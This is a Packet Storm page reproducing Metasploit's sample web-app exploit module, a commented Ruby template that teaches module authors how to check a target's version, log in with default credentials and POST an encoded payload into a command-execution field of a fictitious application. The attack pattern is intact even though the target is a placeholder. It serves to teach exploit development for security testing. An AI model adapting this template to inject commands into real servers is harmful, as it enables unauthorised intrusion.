exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Metasploit Sample Webapp Exploit

Metasploit Sample Webapp Exploit
Posted Dec 16, 2019
Authored by h00die | Site metasploit.com

This Metasploit exploit module illustrates how a vulnerability could be exploited in a webapp.

tags | exploit
SHA-256 | d9287566557239fe81ea0d9ff5e76e38c47a4198c98143517d6bcf331026e3b2

Metasploit Sample Webapp Exploit

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

###
#
# This exploit sample shows how an exploit module could be written to exploit
# a bug in an arbitrary web server
#
###
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking

#
# This exploit affects a webapp, so we need to import HTTP Client
# to easily interact with it.
#
include Msf::Exploit::Remote::HttpClient

def initialize(info = {})
super(
update_info(
info,
# The Name should be just like the line of a Git commit - software name,
# vuln type, class. Preferably apply
# some search optimization so people can actually find the module.
# We encourage consistency between module name and file name.
'Name' => 'Sample Webapp Exploit',
'Description' => %q(
This exploit module illustrates how a vulnerability could be exploited
in a webapp.
),
'License' => MSF_LICENSE,
# The place to add your name/handle and email. Twitter and other contact info isn't handled here.
# Add reference to additional authors, like those creating original proof of concepts or
# reference materials.
# It is also common to comment in who did what (PoC vs metasploit module, etc)
'Author' =>
[
'h00die <mike@stcyrsecurity.com>', # msf module
'researcher' # original PoC, analysis
],
'References' =>
[
[ 'OSVDB', '12345' ],
[ 'EDB', '12345' ],
[ 'URL', 'http://www.example.com'],
[ 'CVE', '1978-1234']
],
# platform refers to the type of platform. For webapps, this is typically the language of the webapp.
# js, php, python, nodejs are common, this will effect what payloads can be matched for the exploit.
# A full list is available in lib/msf/core/payload/uuid.rb
'Platform' => ['python'],
# from lib/msf/core/module/privileged, denotes if this requires or gives privileged access
'Privileged' => false,
# from underlying architecture of the system. typically ARCH_X64 or ARCH_X86, but for webapps typically
# this is the application language. ARCH_PYTHON, ARCH_PHP, ARCH_JAVA are some examples
# A full list is available in lib/msf/core/payload/uuid.rb
'Arch' => ARCH_PYTHON,
'Targets' =>
[
[ 'Automatic Target', {}]
],
'DisclosureDate' => "Apr 1 2013",
# Note that DefaultTarget refers to the index of an item in Targets, rather than name.
# It's generally easiest just to put the default at the beginning of the list and skip this
# entirely.
'DefaultTarget' => 0
)
)
# set the default port, and a URI that a user can set if the app isn't installed to the root
register_options(
[
Opt::RPORT(80),
OptString.new('USERNAME', [ true, 'User to login with', 'admin']),
OptString.new('PASSWORD', [ false, 'Password to login with', '123456']),
OptString.new('TARGETURI', [ true, 'The URI of the Example Application', '/example/'])
], self.class
)
end

#
# The sample exploit checks the index page to verify the version number is exploitable
# we use a regex for the version number
#
def check
# we want to handle cases where the port/target isn't open/listening gracefully
begin
# only catch the response if we're going to use it, in this case we do for the version
# detection.
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'index.php'),
'method' => 'GET'
)
# gracefully handle if res comes back as nil, since we're not guaranteed a response
# also handle if we get an unexpected HTTP response code
fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil?
fail_with(Failure::UnexpectedReply, "#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") if res.code == 200

# here we're looking through html for the version string, similar to:
# Version 1.2
/Version: (?<version>[\d]{1,2}\.[\d]{1,2})<\/td>/ =~ res.body

if version && Gem::Version.new(version) <= Gem::Version.new('1.3')
vprint_good("Version Detected: #{version}")
Exploit::CheckCode::Appears
end
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
end
Exploit::CheckCode::Safe
end

#
# The exploit method attempts a login, then attempts to throw a command execution
# at a web page through a POST variable
#
def exploit
begin
# attempt a login. In this case we show basic auth, and a POST to a fake username/password
# simply to show how both are done
vprint_status('Attempting login')
# since we will check res to see if auth was a success, make sure to capture the return
res = send_request_cgi(
'uri' => '/login.html',
'method' => 'POST',
'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
'vars_post' => {
'username' => datastore['USERNAME'],
'password' => datastore['PASSWORD']
}
)

# a valid login will give us a 301 redirect to /home.html so check that.
# ALWAYS assume res could be nil and check it first!!!!!
if res && res.code != 301
fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})")
end

# grab our valid cookie
cookie = res.get_cookies
# we don't care what the response is, so don't bother saving it from send_request_cgi
vprint_status('Attempting exploit')
send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'command.html'),
'method' => 'POST',
'cookie' => cookie,
'vars_post' =>
{
'cmd_str' => payload.encoded
}
)

rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
end

end
end
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    0 Files
  • 16
    Apr 16th
    0 Files
  • 17
    Apr 17th
    0 Files
  • 18
    Apr 18th
    0 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close